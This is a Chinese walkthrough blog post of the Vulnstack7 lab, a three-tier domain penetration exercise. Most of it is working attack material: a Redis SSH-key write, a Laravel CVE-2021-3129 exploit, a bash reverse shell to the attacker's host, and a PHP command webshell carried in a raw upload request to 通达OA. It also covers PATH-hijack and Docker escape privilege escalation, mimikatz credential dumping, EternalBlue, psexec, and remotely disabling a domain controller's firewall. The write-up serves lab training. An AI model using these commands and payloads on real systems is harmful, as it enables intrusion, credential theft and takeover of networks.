红日靶场(七)vulnstack7

这篇具有很好参考价值的文章主要介绍了红日靶场(七)vulnstack7。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

环境下载

http://vulnstack.qiyuanxuetang.net/vuln/detail/9/

靶场配置

DMZ IP段为192.168.1.0/24

二层网络 IP段为192.168.52.0/24

三层网络 IP段为192.168.93.0/24

VM新增虚拟网卡VMnet8、VMnet14。VMnet8为NAT模式,IP段为192.168.52.0/24;VMnet14为仅主机模式,IP段为192.168.93.0/24

VMnet14设为仅主机模式这样三层网络中的主机不能为外网通信减少被攻击的可能

DMZ区域:

给web1配置了两个网卡,一个桥接可以对外提供服务;一个VMnet8可以连接第二层网络

第二层网络区域:

web2和pc1都配置了两个网卡,一个VMnet8连接第二层网络,一个VMnet14连接第三层网络

第三层网络区域:

给win server和pc2都只配一个网卡,VMnet14连接第三网络

服务配置

靶机需要运行着才能攻击,关闭靶机再次启动各项服务需要重新启动

DMZ区的 Ubuntu 需要启动Nginx和Redis服务:

注意:服务要在root权限下运行

redis-server /etc/redis.conf

/usr/sbin/nginx -c /etc/nginx/nginx.conf

iptables -F

第二层网络的 Ubuntu需要启动Docker容器:

注意:服务要在root权限下运行

sudo service docker start

sudo docker start 8e172820ac78

第三层网络的 Windows 7(PC 1)需要启动通达OA:

注意:启动通达OA要管理员密码

C:\MYOA\bin\AutoConfig.exe

用户名密码:
域用户账户和密码如下:
    Administrator:Whoami2021
    whoami:Whoami2021
    bunny:Bunny2021
    moretz:Moretz2021

Ubuntu 1:
    web:web2021

Ubuntu 2:
    ubuntu:ubuntu

实战

我的kali攻击IP为192.168.1.113

首先进行网段主机扫描 

红日靶场7,靶场渗透,安全,网络

发现靶机IP192.168.1.116

扫端口

红日靶场7,靶场渗透,安全,网络

 发现可能有漏洞的端口80、81、6379

80端口在我渗透时404

6379端口有未授权访问

首先下载redis-cli工具,在kali上连接192.168.1.116:6379上的redis

redis-cli -h 192.168.1.116

 有了未授权,我们直接向目标主机写入ssh公钥,先在kali上生成ssh公钥

ssh-keygen -t rsa

 然后将公钥导入hi.txt文件(前后用\n换行,避免和Redis了其他缓存数据混合),再把hi.txt文件内容写进目标主机的redis缓存里

(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > hi.txt
cat hi.txt | redis-cli -h 192.168.1.116 -x set hello

 -x 代表从标准输入读取数据作为改命令的最后一个参数

 红日靶场7,靶场渗透,安全,网络

 然后使用kali连接目标机器redis,将ssh公钥写进目标主机

config set dir /root/.ssh    # 设置redis的备份路径为/root/.ssh/
config set dbfilename authorized_keys    # 设置保存文件名为authorized_keys
save    # 将数据保存在目标服务器硬盘上

 红日靶场7,靶场渗透,安全,网络

 使用ssh 192.168.1.116连接成功

 红日靶场7,靶场渗透,安全,网络

 进行信息收集发现存在52.0网段

红日靶场7,靶场渗透,安全,网络

ls /home下的文件发现有目录web 

cd /etc/nginx/conf.d/

 发现目录下有两个配置文件一个是80的一个是81的,80端口404报错查看81端口的配置

发现81端口进行了反向代理

81端口

红日靶场7,靶场渗透,安全,网络

 发现是Laravel框架,这个版本为v8.29.0(PHP v7.4.14)

这版本存在远程代码执行漏洞,可以通过exp打,生成shell

工具地址

https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP红日靶场7,靶场渗透,安全,网络

 使用哥斯拉2.92版本可以直接连接

注意:高版本的哥斯拉生成的马的加密方式已经改变会导致连接失败

https://github.com/BeichenDream/Godzilla红日靶场7,靶场渗透,安全,网络

 成功连上shell

红日靶场7,靶场渗透,安全,网络

发现是个docker容器

先向kali中反弹一个shell

然后我们在kali上先开启8848端口的监听

nc -lvvp 8848

反弹shell

bash -c 'exec bash -i &>/dev/tcp/192.168.1.113/8848<&1'

红日靶场7,靶场渗透,安全,网络

kali成功上线shell

 红日靶场7,靶场渗透,安全,网络

 目前权限还不够让我们进一步进行渗透

目前的权限是www,我们可以利用容器操纵实体机修改ssh,进行免密登陆

现在的权限不支持我们进行这一步

所以进行提权

首先查找高权限的文件,也就是可以进行root操作的权限

使用find命令来搜索SUID或4000权限的文件

find / -perm -u=s -type f 2>/dev/null

 红日靶场7,靶场渗透,安全,网络

 这里查完可以知道home/jobs的shell是以高权限运行的

红日靶场7,靶场渗透,安全,网络

 我们写一个恶意的ps,里面进入shell命令行,修改环境变量,让shell找ps的时候找我们写的恶意ps

cd /tmp
echo "/bin/bash" > ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH # 将/tmp添加到环境变量中,并且先加载执行/tmp里的程序
cd /home/jobs
./shell

 红日靶场7,靶场渗透,安全,网络

 运行shell后发现我们的权限提高成root了

此方法称为环境变量劫持

再来一个tty的交互式

python -c 'import pty; pty.spawn("/bin/bash")'

 现在我们实现了www用户到root用户的权限提升,但可惜我们这台并不是实体机我们需要进行docker特权逃逸

docker特权逃逸

特权模式于版本0.6被引入docker,允许容器内的root拥有外部物理机root的权限,而此前容器内root用户拥有外部物理机普通用户权限

首先我们在docker中新建一个/hi目录用来挂载文件

mkdir /hi

 尝试将/dev/sda1挂载到/hi目录里

mount /dev/sda1 /hi

红日靶场7,靶场渗透,安全,网络

 我们在刚才获取的web1主机上生成一个ssh密钥

接下来将我们生成的ssh密钥写入/hi/home/ubuntu/.ssh目录的authorzed_keys文件中,写入后我们就可以使用密钥登录改机器

红日靶场7,靶场渗透,安全,网络

 我们将hi.hub中的密钥写入/hi/home/ubuntu/.ssh/authorized_keys中

cp -avx /hi/home/ubuntu/.ssh/id_rsa.pub /hi/home/ubuntu/.ssh/authorized_keys
echo > /hi/home/ubuntu/.ssh/authorized_keys
echo '生成的.pub文件的内容' > /hi/home/ubuntu/.ssh/authorized_keys

 然后我们查看一下是否写入成功

cat /hi/home/ubuntu/.ssh/authorized_keys

 红日靶场7,靶场渗透,安全,网络

 利用web1上的hi密钥进行登录

发现登入上的用户是ubuntu用户,先信息收集,发现存在93网段红日靶场7,靶场渗透,安全,网络

 红日靶场7,靶场渗透,安全,网络

 发现版本为ubuntu14.04版本,此版本存在CVE-2021-3493漏洞

https://github.com/briskets/CVE-2021-3493

影响版本

Ubuntu 20.10
Ubuntu 20.04 LTS
Ubuntu 18.04 LTS
Ubuntu 16.04 LTS
Ubuntu 14.04 ESM
(Linux内核版本 < 5.11)

我们首先建立一个exploit.c文件,然后将脚本内容粘贴进行,然后编译运行就可以获得权限

注意:vim保存文件首先按下ESC键进入命令模式,再按下Shift+:输入wq!进行保存

提示:vim进行脚本内容粘贴时第一行可能会没有需要手打否则会报错(一定要注意,我在做时大意了,没有闪,陷入了自我怀疑)

vim exploit.c
gcc exploit.c -o exploit
chmod +x exploit
./exploit

 成功提权,接下来两台机子上线MSF进攻内网

红日靶场7,靶场渗透,安全,网络

 上线MSF

首先上线web1

use exploit/multi/script/web_delivery
set target 7    # 选择目标系统
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.1.113
set lport 1111
run

 将生成的命令在目标主机上执行,msf就成功上线

 红日靶场7,靶场渗透,安全,网络

 更改端口上线web2

红日靶场7,靶场渗透,安全,网络

 查看一下上线的机子

 红日靶场7,靶场渗透,安全,网络

 路由与socks5代理

我们已经有了两个sessions,但kali与52段的主机无法进行通信,所以我们需要在web1增加一个通往192.168.52.0的路由

route add 目标网段 子网掩码 sessions号

 路由转发只能将msf带进内网,而kali想要将其他攻击程序带进内网还需要搭建socks代理。

https://github.com/idlefire/ew

在kali上执行

./ew_for_linux64 -s rcsocks -l 1080 -e 1234

将 ew_for_linux64上传给web1

 红日靶场7,靶场渗透,安全,网络

 在web1执行

nohup ./ew_for_linux64 -s rssocks -d 192.168.1.113 -e 1234

 然后配置proxychains,将socks5服务器指向127.0.0.1:1080,之后便可以使用proxychains将我们攻击机上的程序代理进第二层网络(192.168.52.1/24)了

vim /etc/proxychains4.conf   
socks5 127.0.0.1 1080

 使用auxiliary/scanner/discovery/udp_probe 模块来扫描第二层网络中的主机存活

set rhosts 192.168.52.1-255
set threads 5
run

 发现30主机,进行端口扫描

proxychains4 nmap -Pn -sT -sV -F -O 192.168.52.30

红日靶场7,靶场渗透,安全,网络

 发现8080端口有nginx的http服务

在攻击机上设置号代理进行访问

发现时通达OA v11.3,该版本存在任意用户登录、文件包含和文件上传等多个漏洞

我们要下载一个火狐的插件方便代理

红日靶场7,靶场渗透,安全,网络

红日靶场7,靶场渗透,安全,网络

 进行抓包

红日靶场7,靶场渗透,安全,网络

 发包上图片马

POST /ispirit/im/upload.php HTTP/1.1
Host: 192.168.52.30:8080
Content-Length: 658
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5
Cookie: PHPSESSID=123
Connection: close

------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="UPLOAD_MODE"

2
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="P"

123
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="DEST_UID"

1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
Content-Type: image/jpeg

<?php
$command=$_POST['cmd'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec("cmd /c ".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
------WebKitFormBoundarypyfBh1YB4pV8McGB--

红日靶场7,靶场渗透,安全,网络

 出现图片马的路径,上传木马

红日靶场7,靶场渗透,安全,网络

 使用msf multi/script/web_deliver模块上线主机

use exploit/multi/script/web_delivery
set target 2
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.113
set lport 3333
run

对新上线的主机进行信息收集

ipconfig /all   # 查看本机ip,所在域
systeminfo      # 列出系统信息
route print     # 打印路由信息
net view        # 查看局域网内其他主机名
arp -a          # 查看arp缓存
whoami
net start       # 查看开启了哪些服务
net share       # 查看开启了哪些共享

net config workstation   # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user                 # 查看本机用户列表
net user /domain         # 查看域用户
net localgroup administrators   # 查看本地管理员组(通常会有域用户)
net view /domain         # 查看有几个域
net user 用户名 /domain   # 获取指定域用户的信息
net group /domain        # 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain    # 查看域中某工作组
net group "domain admins" /domain  # 查看域管理员的名字
net group "domain computers" /domain  # 查看域中的其他主机名
net group "domain controllers" /domain  # 查看域控制器(可能有多台)

 发现93网段

域为whoamianony.org

域控为DC.whoamianony.org,IP为192.168.93.30

域管理员Administrator

将该进程迁移到64的进程上

migrate +进程号(ps命令查看进程)
load kiwi
kiwi_cmd privilege::debug
kiwi_cmd sekurlsa::logonPasswords

 抓到域用户bunny和管理员administrator的凭证

bunny:Bunny2021
administrator:Whoami2021

添加路由攻击93.0网段

红日靶场7,靶场渗透,安全,网络

 首先kali上执行命令

./ew_for_linux64 -s lcx_listen -l 1090 -e 1235

 给新上线的主机上传ew_for_Win.exe

执行

ew_for_Win.exe -s ssocksd -l 999

 给web1执行

./ew_for_linux64 -s lcx_slave -d 192.168.1.113 -e 1235 -f 192.168.52.30 -g 999

 红日靶场7,靶场渗透,安全,网络

 跟之前一样扫描存活主机

use auxiliary/scanner/smb/smb_version
set rhosts 192.168.93.1-255
set threads 5
run

 红日靶场7,靶场渗透,安全,网络

 发现40有445,打个永恒之蓝

setg Proxies socks5:127.0.0.1:1090
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.93.40
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.93.40
set lport 4444
exploit

 失败

把矛头执行40也就是DC,有了管理员和密码,使用psexec模块攻击

use exploit/windows/smb/psexec
set rhosts 192.168.93.30
set lport 9999
set SMBUser administrator
set SMBPass Whoami2021
set payload windows/meterpreter/bind_tcp
set rhost 192.168.93.30
run

 同样不行

可能是防火墙的原因

我们使用上线的win7远程关闭域控的防火墙

net use \\192.168.93.30\ipc$ "Whoami2021" /user:"Administrator"
sc \\192.168.93.30 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc \\192.168.93.30 start unablefirewall

 再次执行

红日靶场7,靶场渗透,安全,网络

 成功拿下,pc2拿不下,考虑cs

cs

很可惜pc2依旧没有拿下(不知道为什么)

红日靶场7,靶场渗透,安全,网络

小结

这个靶场搭建了一下午(包括下载解压)

渗透第二层内网花了一天

渗透第三层内网花了一天

cs又花了一天

这个靶场还是有很多的知识可以学习,我也查询了很多的文章尝试不同的方法

参考文章

(95条消息) 红日七vulnstack7全操作_红日靶场七_TACO TUESDAY67的博客-CSDN博客

自主搭建的三层网络域渗透靶场打靶记录 - FreeBuf网络安全行业门户

(95条消息) 红日安全ATT&CK靶机实战系列之vulnstack7_vulnstack_att&ck7_维梓梓的博客-CSDN博客

 红日靶场 VulnStack7 - Erichas - 博客园 (cnblogs.com)文章来源地址https://www.toymoban.com/news/detail-774773.html

到了这里,关于红日靶场(七)vulnstack7的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【网络安全】DVWA靶场实战&BurpSuite内网渗透

    我们先来认识一下BurpSuite中有哪些攻击模式,然后开始实战操作 下面攻击案例即将使用,对单个参数进行攻击破解 联想战争中狙击手的作用,一次只能击杀一名敌人 联想古代的攻城锤,特点就是攻击范围比狙击手大,但是效率不一定高 可以设置多个攻击字段,但是payload值

    2024年02月13日
    浏览(55)
  • Vulnstack靶场实战(一)

    搭建好靶场后 包括win7的web端,还有win2003为域成员,域控为win2008 win7内网ip:192.168.157.153 外网ip:192.168.52.143 域成员 win2003 ip 192.168.52.141 域控 win2008 ip 192.168.52.138 一、webshell的拿取 1、 首先网址访问192.168.52.143,发现是php探针页面 2、 打开御剑进行目录扫描,扫描到后台地址,

    2024年02月04日
    浏览(30)
  • 红日靶场2

    1、初始密码为1qaz@WSX,注意WEB这台机器,需要切换用户为de1ay,密码为1qaz@WSX登入 2、修改网卡,如PC 、WEB 拥有俩个网卡,则网卡一设置为nat,也可以是主机模式,但由于学校校园网认证方面的问题,主机模式无法上网,所以我用nat模式。对应的把nat模式的网段修改为192.168.

    2023年04月16日
    浏览(30)
  • 红日靶场四

    目录 环境搭建 环境说明 官方描述 外网信息收集与利用 struts2漏洞 Tomcat漏洞  docker逃逸 提权  内网渗透 扫描内网主机端口 端口转发 利用永恒之蓝获得win7  mimikatz抓取密码  域横向移动 利用Kerberos 域用户提权漏洞获得域控WIN2008 上传msf马到域控   mimikatz抓取密码 远程登陆域

    2024年02月03日
    浏览(43)
  • 红日靶场1

    靶场环境搭建 机器名称 外网IP(模拟外网) 内网IP(模拟内网) 攻击机器 192.168.142.133 Win7机器 192.168.142.210 192.168.140.210 Win Server 2008机器(DC) 192.168.140.220 Win Server 2003机器 192.168.140.230 坑点 (1)在Win7机器上打开phpstudy时,第一次会出现报错,需要重启一下Win7机器。 1、通过

    2024年02月08日
    浏览(41)
  • 红日靶场5

    目录 前言 外网渗透 信息收集 1、arp探测 2、nmap 3、nikto 4、whatweb 5、gobuster 6、dirsearch 漏洞探测 ThinKPHP漏洞 漏洞利用 get shell 内网渗透 信息收集 CS 启动! CS连接 CS信息收集 1、hashdump 2、猕猴桃 3、端口扫描 MSF启动! MSF木马生成 MSF监听模块 MSF信息收集 1、添加内网路由 2、引入

    2024年01月16日
    浏览(36)
  • 红日ATT&CK系列靶场(-)简记

    Step 1》信息收集 nmap 发现80、 3306 nmap -T4 -O 192.168.92.100 访问80端口 dirsearch(御剑)扫描 发现:/phpMyadmin Step 2 》漏洞利用 1.弱口令 http://192.168.92.100/phpMyadmin root/root 登录成功 2.getshell select @@basedir //查绝对路径 into outfile 写马 select \\\'?php eval($_POST[cmd]);?\\\' into outfile \\\'C://绝对路径/shell.

    2024年02月09日
    浏览(44)
  • 红日靶场2 ATT&&CK攻击

    360免杀其实没有你想象的那么难 首先最重要的是 你要用免杀脚本对你所生成的木马病毒进行加密 然后加密系统的内核,就是上一篇文章所提及的 是通过两次加密之后 所输出的结果,让360无法感知到,然后先通过java反序列化工具将冰蝎工具的JSP后门代码上传上去,这个不会

    2024年01月18日
    浏览(43)
  • 红日靶场2 指免杀360 个人学习记录

    360安全卫士,有一说一,确实很强,这几天研究的MSF利用java反序列化的漏洞是无法利用的,其他方法也瘦小甚微 前几天在研究用 用免杀工具 go-shellcode-loader-main免杀工具对我们生成的木马进行加密 本来是用csa4.0黑客工具生成了一个jsp的恶意代码 我首先要承认,微软自带的病

    2024年01月16日
    浏览(42)
  • BurpSuite实战教程01-web渗透安全测试(靶场搭建及常见漏洞攻防)

    渗透测试(Penetration test)即安全工程师模拟黑客,在合法授权范围内,通过信息搜集、漏洞挖掘、权限提升等行为,对目标对象进行安全测试(或攻击),最终找出安全风险并输出测试报告。 Web渗透测试分为白盒测试和黑盒测试,白盒测试是指目标网站的源码等信息的情况

    2024年02月13日
    浏览(48)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包